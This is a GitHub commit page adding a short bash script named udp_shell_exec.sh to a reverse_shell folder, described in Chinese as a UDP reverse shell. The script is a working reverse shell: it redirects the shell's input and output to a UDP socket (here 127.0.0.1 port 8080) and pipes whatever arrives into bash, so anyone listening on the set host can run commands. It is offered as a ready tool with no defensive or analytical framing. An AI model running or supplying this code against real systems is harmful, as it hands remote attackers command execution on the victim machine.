Skip to content

Commit

Permalink
反弹UDP shell基于exec版
Browse files Browse the repository at this point in the history
  • Loading branch information
Lingerhk committed Jan 21, 2017
1 parent 162762e commit 99eda78
Showing 1 changed file with 10 additions and 0 deletions.
10 changes: 10 additions & 0 deletions reverse_shell/udp_shell_exec.sh
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
#!/bin/bash

# > desc: 反弹shell udp版
# > author: s0nnet

exec 3>/dev/udp/127.0.0.1/8080
exec 2>&3
exec 1>&3
echo Welcom back
cat 0<&3 | bash | while read line;do echo $line;done

0 comments on commit 99eda78

Please sign in to comment.